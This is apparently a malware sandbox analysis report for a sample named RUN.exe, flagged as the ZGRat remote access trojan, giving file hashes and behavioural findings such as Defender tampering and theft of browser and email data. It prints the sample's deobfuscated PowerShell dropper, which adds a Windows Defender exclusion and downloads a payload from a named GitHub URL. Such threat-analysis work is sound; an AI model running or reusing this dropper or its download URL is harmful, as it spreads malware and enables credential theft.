Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    RUN.exe

  • Size

    25.5MB

  • Sample

    240122-xrc4tsdaa4

  • MD5

    f559e8fbcaf4bf3decd0e959883674b8

  • SHA1

    a0bde63feed25ed365ba4bacccfc2e20fff3972d

  • SHA256

    f4f8f06d721e990735ac49cd219c8039b4f43d919305aee5282249e8d4db9063

  • SHA512

    4c65ed26ae899189ef65ac9d36757405e5cb9220e62bb4a4d3fca91e21b9ba9a2d7cd495fe2998d25488025bfeacc299a3bf5a323832f9e3cd3ab4ef74e97d7a

  • SSDEEP

    393216:XOIAa2nR1/+ryDP5YKgoWWCdffSwObQFmSLeLVpevjpsJaxkFrphpLo6baYByTK4:oao/x5XWWKo7SLe7e9iBrhdNmYByTLP

Malware Config

Extracted

Language
ps1
Deobfuscated
1
"Continue" = "SilentlyContinue"
2
timeout / nobreak / t 5
3
$file = "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates\\SurrogateServerIntoSvc.exe"
4
if (test-path -path $file) {
5
exit
6
}
7
$vrer2 = "$env:userprofile"
8
add-mppreference -exclusionpath "$vrer2" -force
9
new-item -path "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates" -itemtype directory
10
# Block for declaring the script parameters.
11
# Block for declaring the script parameters.
12
# Block for declaring the script parameters.
13
# Block for declaring the script parameters.
14
$webfile = "https://raw.githubusercontent.com/washywashy14/7zip-bin/master/win/Uemlxaw.zip"
15
# Block for declaring the script parameters.
16
# Block for declaring the script parameters.
17
# Block for declaring the script parameters.
18
# Block for declaring the script parameters.
19
$outff = "$env:localappdata\\Microwave\\Vault\\TelemetryHandlers\\winupdates\\Uemlxaw.zip"
20
invoke-webrequest -uri $webfile -outfile $outff
URLs
exe.dropper

https://raw.githubusercontent.com/washywashy14/7zip-bin/master/win/Uemlxaw.zip

Targets

    • Target

      RUN.exe

    • Size

      25.5MB

    • MD5

      f559e8fbcaf4bf3decd0e959883674b8

    • SHA1

      a0bde63feed25ed365ba4bacccfc2e20fff3972d

    • SHA256

      f4f8f06d721e990735ac49cd219c8039b4f43d919305aee5282249e8d4db9063

    • SHA512

      4c65ed26ae899189ef65ac9d36757405e5cb9220e62bb4a4d3fca91e21b9ba9a2d7cd495fe2998d25488025bfeacc299a3bf5a323832f9e3cd3ab4ef74e97d7a

    • SSDEEP

      393216:XOIAa2nR1/+ryDP5YKgoWWCdffSwObQFmSLeLVpevjpsJaxkFrphpLo6baYByTK4:oao/x5XWWKo7SLe7e9iBrhdNmYByTLP

    • Detect ZGRat V1

    • Modifies Windows Defender Real-time Protection settings

    • Modifies security service

    • Suspicious use of NtCreateUserProcessOtherParentProcess

    • ZGRat

      ZGRat is remote access trojan written in C#.

    • Downloads MZ/PE file

    • Drops file in Drivers directory

    • Stops running service(s)

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Executes dropped EXE

    • Loads dropped DLL

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

    • Accesses Microsoft Outlook profiles

    • Adds Run key to start application

    • Blocklisted process makes network request

    • Checks installed software on the system

      Looks up Uninstall key entries in the registry to enumerate software on the system.

    • Enumerates connected drives

      Attempts to read the root path of hard drives other than the default C: drive.

    • Legitimate hosting services abused for malware hosting/C2

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Drops file in System32 directory

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.